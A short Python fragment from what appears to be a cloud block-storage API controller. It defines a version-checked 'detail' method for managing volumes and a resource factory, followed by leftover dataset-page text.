def detail(self, req):
"""Returns a detailed list of volumes available to manage."""
self._ensure_min_version(req, "3.8")
return super(VolumeManageController, self).detail(req)
def create_resource():
return wsgi.Resource(VolumeManageController())
| nilq/baby-python | python |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.